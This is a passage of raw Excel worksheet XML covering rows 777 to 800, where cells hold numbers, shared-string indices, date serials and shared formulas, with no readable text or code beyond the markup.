        <v>25</v>
      </c>
      <c r="J777" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K777" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L777" s="1">
        <v>6.0</v>
      </c>
      <c r="M777" s="1">
        <v>13.0</v>
      </c>
      <c r="N777" s="1" t="s">
        <v>78</v>
      </c>
      <c r="O777" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P777" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q777" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R777" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S777" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="778">
      <c r="A778" s="1">
        <v>10046.0</v>
      </c>
      <c r="B778" s="2" t="s">
        <v>3426</v>
      </c>
      <c r="C778" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D778" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E778" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F778" s="1" t="s">
        <v>771</v>
      </c>
      <c r="G778" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H778" s="4">
        <v>44896.686111111114</v>
      </c>
      <c r="I778" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J778" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K778" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L778" s="1">
        <v>6.0</v>
      </c>
      <c r="M778" s="1">
        <v>13.0</v>
      </c>
      <c r="N778" s="1" t="s">
        <v>3427</v>
      </c>
      <c r="O778" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P778" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q778" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R778" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S778" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="779">
      <c r="A779" s="1">
        <v>10048.0</v>
      </c>
      <c r="B779" s="2" t="s">
        <v>3428</v>
      </c>
      <c r="C779" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D779" s="2" t="s">
        <v>3395</v>
      </c>
      <c r="E779" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F779" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G779" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H779" s="4">
        <v>44896.847916666666</v>
      </c>
      <c r="I779" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J779" s="1" t="s">
        <v>3416</v>
      </c>
      <c r="K779" s="2" t="s">
        <v>3417</v>
      </c>
      <c r="L779" s="1">
        <v>6.0</v>
      </c>
      <c r="M779" s="1">
        <v>13.0</v>
      </c>
      <c r="N779" s="1" t="s">
        <v>677</v>
      </c>
      <c r="O779" s="1" t="s">
        <v>3418</v>
      </c>
      <c r="P779" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q779" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R779" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S779" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="780">
      <c r="A780" s="1">
        <v>10050.0</v>
      </c>
      <c r="B780" s="2" t="s">
        <v>3429</v>
      </c>
      <c r="C780" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D780" s="2" t="s">
        <v>3430</v>
      </c>
      <c r="E780" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F780" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G780" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H780" s="4">
        <v>44536.770833333336</v>
      </c>
      <c r="I780" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J780" s="1" t="s">
        <v>3431</v>
      </c>
      <c r="K780" s="2" t="s">
        <v>3432</v>
      </c>
      <c r="L780" s="1">
        <v>1.0</v>
      </c>
      <c r="M780" s="1">
        <v>1.0</v>
      </c>
      <c r="N780" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O780" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P780" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q780" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R780" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S780" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="781">
      <c r="A781" s="1">
        <v>10051.0</v>
      </c>
      <c r="B781" s="2" t="s">
        <v>3433</v>
      </c>
      <c r="C781" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D781" s="2" t="s">
        <v>3434</v>
      </c>
      <c r="E781" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F781" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G781" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H781" s="1" t="s">
        <v>3435</v>
      </c>
      <c r="I781" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J781" s="1" t="s">
        <v>3436</v>
      </c>
      <c r="K781" s="2" t="s">
        <v>3437</v>
      </c>
      <c r="L781" s="1">
        <v>1.0</v>
      </c>
      <c r="M781" s="1">
        <v>1.0</v>
      </c>
      <c r="N781" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O781" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P781" s="1" t="s">
        <v>3438</v>
      </c>
      <c r="Q781" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R781" s="2">
        <f t="shared" si="2"/>
        <v>10</v>
      </c>
      <c r="S781" s="1">
        <f t="shared" si="3"/>
        <v>10</v>
      </c>
    </row>
    <row r="782">
      <c r="A782" s="1">
        <v>10053.0</v>
      </c>
      <c r="B782" s="2" t="s">
        <v>3439</v>
      </c>
      <c r="C782" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D782" s="2" t="s">
        <v>3440</v>
      </c>
      <c r="E782" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F782" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G782" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H782" s="1" t="s">
        <v>3441</v>
      </c>
      <c r="I782" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J782" s="1" t="s">
        <v>3442</v>
      </c>
      <c r="K782" s="2" t="s">
        <v>3443</v>
      </c>
      <c r="L782" s="1">
        <v>7.0</v>
      </c>
      <c r="M782" s="1">
        <v>14.0</v>
      </c>
      <c r="N782" s="1" t="s">
        <v>237</v>
      </c>
      <c r="O782" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="P782" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q782" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R782" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S782" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="783">
      <c r="A783" s="1">
        <v>10054.0</v>
      </c>
      <c r="B783" s="2" t="s">
        <v>3445</v>
      </c>
      <c r="C783" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D783" s="2" t="s">
        <v>3446</v>
      </c>
      <c r="E783" s="2" t="s">
        <v>1301</v>
      </c>
      <c r="F783" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G783" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H783" s="1" t="s">
        <v>3447</v>
      </c>
      <c r="I783" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J783" s="1" t="s">
        <v>3442</v>
      </c>
      <c r="K783" s="2" t="s">
        <v>3443</v>
      </c>
      <c r="L783" s="1">
        <v>7.0</v>
      </c>
      <c r="M783" s="1">
        <v>14.0</v>
      </c>
      <c r="N783" s="1" t="s">
        <v>2777</v>
      </c>
      <c r="O783" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="P783" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q783" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R783" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S783" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="784">
      <c r="A784" s="1">
        <v>10055.0</v>
      </c>
      <c r="B784" s="2" t="s">
        <v>3448</v>
      </c>
      <c r="C784" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D784" s="2" t="s">
        <v>3449</v>
      </c>
      <c r="E784" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F784" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G784" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H784" s="1" t="s">
        <v>3450</v>
      </c>
      <c r="I784" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J784" s="1" t="s">
        <v>3442</v>
      </c>
      <c r="K784" s="2" t="s">
        <v>3443</v>
      </c>
      <c r="L784" s="1">
        <v>7.0</v>
      </c>
      <c r="M784" s="1">
        <v>14.0</v>
      </c>
      <c r="N784" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O784" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="P784" s="1" t="s">
        <v>1416</v>
      </c>
      <c r="Q784" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R784" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S784" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="785">
      <c r="A785" s="1">
        <v>10060.0</v>
      </c>
      <c r="B785" s="2" t="s">
        <v>3451</v>
      </c>
      <c r="C785" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D785" s="2" t="s">
        <v>3452</v>
      </c>
      <c r="E785" s="6" t="s">
        <v>517</v>
      </c>
      <c r="F785" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G785" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H785" s="1" t="s">
        <v>3453</v>
      </c>
      <c r="I785" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J785" s="1" t="s">
        <v>3442</v>
      </c>
      <c r="K785" s="2" t="s">
        <v>3443</v>
      </c>
      <c r="L785" s="1">
        <v>7.0</v>
      </c>
      <c r="M785" s="1">
        <v>14.0</v>
      </c>
      <c r="N785" s="1" t="s">
        <v>3381</v>
      </c>
      <c r="O785" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="P785" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q785" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R785" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S785" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="786">
      <c r="A786" s="1">
        <v>10064.0</v>
      </c>
      <c r="B786" s="2" t="s">
        <v>3454</v>
      </c>
      <c r="C786" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D786" s="6" t="s">
        <v>3455</v>
      </c>
      <c r="E786" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F786" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G786" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H786" s="1" t="s">
        <v>3456</v>
      </c>
      <c r="I786" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J786" s="1" t="s">
        <v>3442</v>
      </c>
      <c r="K786" s="2" t="s">
        <v>3443</v>
      </c>
      <c r="L786" s="1">
        <v>7.0</v>
      </c>
      <c r="M786" s="1">
        <v>14.0</v>
      </c>
      <c r="N786" s="1" t="s">
        <v>792</v>
      </c>
      <c r="O786" s="1" t="s">
        <v>3444</v>
      </c>
      <c r="P786" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q786" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R786" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S786" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="787">
      <c r="A787" s="1">
        <v>10066.0</v>
      </c>
      <c r="B787" s="2" t="s">
        <v>3457</v>
      </c>
      <c r="C787" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D787" s="6" t="s">
        <v>3455</v>
      </c>
      <c r="E787" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F787" s="1" t="s">
        <v>3458</v>
      </c>
      <c r="G787" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H787" s="4">
        <v>43508.43125</v>
      </c>
      <c r="I787" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J787" s="1" t="s">
        <v>3459</v>
      </c>
      <c r="K787" s="2" t="s">
        <v>3460</v>
      </c>
      <c r="L787" s="1">
        <v>1.0</v>
      </c>
      <c r="M787" s="1">
        <v>1.0</v>
      </c>
      <c r="N787" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O787" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P787" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q787" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R787" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S787" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="788">
      <c r="A788" s="1">
        <v>10067.0</v>
      </c>
      <c r="B788" s="2" t="s">
        <v>3461</v>
      </c>
      <c r="C788" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D788" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="E788" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F788" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G788" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H788" s="4">
        <v>44685.87013888889</v>
      </c>
      <c r="I788" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J788" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="K788" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="L788" s="1">
        <v>6.0</v>
      </c>
      <c r="M788" s="1">
        <v>12.0</v>
      </c>
      <c r="N788" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O788" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="P788" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q788" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R788" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S788" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="789">
      <c r="A789" s="1">
        <v>10068.0</v>
      </c>
      <c r="B789" s="2" t="s">
        <v>3466</v>
      </c>
      <c r="C789" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D789" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="E789" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F789" s="1" t="s">
        <v>3467</v>
      </c>
      <c r="G789" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H789" s="4">
        <v>44685.89027777778</v>
      </c>
      <c r="I789" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J789" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="K789" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="L789" s="1">
        <v>6.0</v>
      </c>
      <c r="M789" s="1">
        <v>12.0</v>
      </c>
      <c r="N789" s="1" t="s">
        <v>2802</v>
      </c>
      <c r="O789" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="P789" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q789" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R789" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S789" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="790">
      <c r="A790" s="1">
        <v>10069.0</v>
      </c>
      <c r="B790" s="2" t="s">
        <v>3468</v>
      </c>
      <c r="C790" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D790" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="E790" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F790" s="1" t="s">
        <v>3469</v>
      </c>
      <c r="G790" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H790" s="4">
        <v>44685.89722222222</v>
      </c>
      <c r="I790" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J790" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="K790" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="L790" s="1">
        <v>6.0</v>
      </c>
      <c r="M790" s="1">
        <v>12.0</v>
      </c>
      <c r="N790" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O790" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="P790" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q790" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R790" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S790" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="791">
      <c r="A791" s="1">
        <v>10070.0</v>
      </c>
      <c r="B791" s="2" t="s">
        <v>3470</v>
      </c>
      <c r="C791" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D791" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="E791" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F791" s="1" t="s">
        <v>785</v>
      </c>
      <c r="G791" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H791" s="4">
        <v>44685.989583333336</v>
      </c>
      <c r="I791" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J791" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="K791" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="L791" s="1">
        <v>6.0</v>
      </c>
      <c r="M791" s="1">
        <v>12.0</v>
      </c>
      <c r="N791" s="1" t="s">
        <v>3471</v>
      </c>
      <c r="O791" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="P791" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q791" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R791" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S791" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="792">
      <c r="A792" s="1">
        <v>10071.0</v>
      </c>
      <c r="B792" s="2" t="s">
        <v>3472</v>
      </c>
      <c r="C792" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D792" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="E792" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F792" s="1" t="s">
        <v>3473</v>
      </c>
      <c r="G792" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H792" s="4">
        <v>44716.10902777778</v>
      </c>
      <c r="I792" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J792" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="K792" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="L792" s="1">
        <v>6.0</v>
      </c>
      <c r="M792" s="1">
        <v>12.0</v>
      </c>
      <c r="N792" s="1" t="s">
        <v>3474</v>
      </c>
      <c r="O792" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="P792" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q792" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R792" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S792" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="793">
      <c r="A793" s="1">
        <v>10073.0</v>
      </c>
      <c r="B793" s="2" t="s">
        <v>3475</v>
      </c>
      <c r="C793" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D793" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="E793" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F793" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G793" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H793" s="4">
        <v>44777.94652777778</v>
      </c>
      <c r="I793" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J793" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="K793" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="L793" s="1">
        <v>6.0</v>
      </c>
      <c r="M793" s="1">
        <v>12.0</v>
      </c>
      <c r="N793" s="1" t="s">
        <v>1502</v>
      </c>
      <c r="O793" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="P793" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q793" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R793" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S793" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="794">
      <c r="A794" s="1">
        <v>10074.0</v>
      </c>
      <c r="B794" s="2" t="s">
        <v>3476</v>
      </c>
      <c r="C794" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D794" s="2" t="s">
        <v>3462</v>
      </c>
      <c r="E794" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F794" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G794" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H794" s="4">
        <v>44777.947222222225</v>
      </c>
      <c r="I794" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J794" s="1" t="s">
        <v>3463</v>
      </c>
      <c r="K794" s="2" t="s">
        <v>3464</v>
      </c>
      <c r="L794" s="1">
        <v>6.0</v>
      </c>
      <c r="M794" s="1">
        <v>12.0</v>
      </c>
      <c r="N794" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O794" s="1" t="s">
        <v>3465</v>
      </c>
      <c r="P794" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q794" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R794" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S794" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="795">
      <c r="A795" s="1">
        <v>10079.0</v>
      </c>
      <c r="B795" s="2" t="s">
        <v>3477</v>
      </c>
      <c r="C795" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D795" s="2" t="s">
        <v>3478</v>
      </c>
      <c r="E795" s="2" t="s">
        <v>99</v>
      </c>
      <c r="F795" s="1" t="s">
        <v>2202</v>
      </c>
      <c r="G795" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H795" s="4">
        <v>44777.77638888889</v>
      </c>
      <c r="I795" s="1" t="s">
        <v>1711</v>
      </c>
      <c r="J795" s="1" t="s">
        <v>3479</v>
      </c>
      <c r="K795" s="2" t="s">
        <v>3480</v>
      </c>
      <c r="L795" s="1">
        <v>5.0</v>
      </c>
      <c r="M795" s="1">
        <v>5.0</v>
      </c>
      <c r="N795" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O795" s="1" t="s">
        <v>3481</v>
      </c>
      <c r="P795" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q795" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R795" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S795" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="796">
      <c r="A796" s="1">
        <v>10080.0</v>
      </c>
      <c r="B796" s="2" t="s">
        <v>3482</v>
      </c>
      <c r="C796" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D796" s="2" t="s">
        <v>3478</v>
      </c>
      <c r="E796" s="2" t="s">
        <v>42</v>
      </c>
      <c r="F796" s="1" t="s">
        <v>119</v>
      </c>
      <c r="G796" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H796" s="4">
        <v>44777.77777777778</v>
      </c>
      <c r="I796" s="1" t="s">
        <v>1711</v>
      </c>
      <c r="J796" s="1" t="s">
        <v>3479</v>
      </c>
      <c r="K796" s="2" t="s">
        <v>3480</v>
      </c>
      <c r="L796" s="1">
        <v>5.0</v>
      </c>
      <c r="M796" s="1">
        <v>5.0</v>
      </c>
      <c r="N796" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O796" s="1" t="s">
        <v>3481</v>
      </c>
      <c r="P796" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q796" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R796" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S796" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="797">
      <c r="A797" s="1">
        <v>10084.0</v>
      </c>
      <c r="B797" s="2" t="s">
        <v>3483</v>
      </c>
      <c r="C797" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D797" s="2" t="s">
        <v>3484</v>
      </c>
      <c r="E797" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F797" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G797" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H797" s="4">
        <v>44381.833333333336</v>
      </c>
      <c r="I797" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J797" s="1" t="s">
        <v>3485</v>
      </c>
      <c r="K797" s="2" t="s">
        <v>3486</v>
      </c>
      <c r="L797" s="1">
        <v>1.0</v>
      </c>
      <c r="M797" s="1">
        <v>1.0</v>
      </c>
      <c r="N797" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O797" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P797" s="1" t="s">
        <v>1063</v>
      </c>
      <c r="Q797" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R797" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S797" s="1">
        <f t="shared" si="3"/>
        <v>3</v>
      </c>
    </row>
    <row r="798">
      <c r="A798" s="1">
        <v>10085.0</v>
      </c>
      <c r="B798" s="2" t="s">
        <v>3487</v>
      </c>
      <c r="C798" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D798" s="2" t="s">
        <v>3488</v>
      </c>
      <c r="E798" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F798" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G798" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H798" s="1" t="s">
        <v>3489</v>
      </c>
      <c r="I798" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J798" s="1" t="s">
        <v>3490</v>
      </c>
      <c r="K798" s="2" t="s">
        <v>3491</v>
      </c>
      <c r="L798" s="1">
        <v>1.0</v>
      </c>
      <c r="M798" s="1">
        <v>1.0</v>
      </c>
      <c r="N798" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O798" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P798" s="1" t="s">
        <v>1069</v>
      </c>
      <c r="Q798" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R798" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S798" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="799">
      <c r="A799" s="1">
        <v>10086.0</v>
      </c>
      <c r="B799" s="2" t="s">
        <v>3492</v>
      </c>
      <c r="C799" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D799" s="2" t="s">
        <v>3493</v>
      </c>
      <c r="E799" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F799" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G799" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H799" s="1" t="s">
        <v>3494</v>
      </c>
      <c r="I799" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J799" s="1" t="s">
        <v>3495</v>
      </c>
      <c r="K799" s="2" t="s">
        <v>3496</v>
      </c>
      <c r="L799" s="1">
        <v>1.0</v>
      </c>
      <c r="M799" s="1">
        <v>1.0</v>
      </c>
      <c r="N799" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O799" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P799" s="1" t="s">
        <v>3497</v>
      </c>
      <c r="Q799" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R799" s="2">
        <f t="shared" si="2"/>
        <v>9</v>
      </c>
      <c r="S799" s="1">
        <f t="shared" si="3"/>
        <v>9</v>
      </c>
    </row>
    <row r="800">
      <c r="A800" s="1">
        <v>10087.0</v>
      </c>
      <c r="B800" s="2" t="s">
        <v>3498</v>
      </c>
      <c r="C800" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D800" s="2" t="s">
        <v>3499</v>
      </c>
      <c r="E800" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F800" s="1" t="s">
        <v>896</v>
      </c>
      <c r="G800" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H800" s="1" t="s">
        <v>3500</v>
      </c>
      <c r="I800" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J800" s="1" t="s">
        <v>3501</v>
      </c>
      <c r="K800" s="2" t="s">
        <v>3502</v>
      </c>
      <c r="L800" s="1">
        <v>5.0</v>
      </c>
      <c r="M800" s="1">
        <v>13.0</v>
      </c>
      <c r="N800" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O800" s="1" t="s">
        <v>3503</v>
      </c>
      <c r="P800" s="1" t="s">
        <v>3504</v>
      </c>
      <c r="Q800" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R800" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
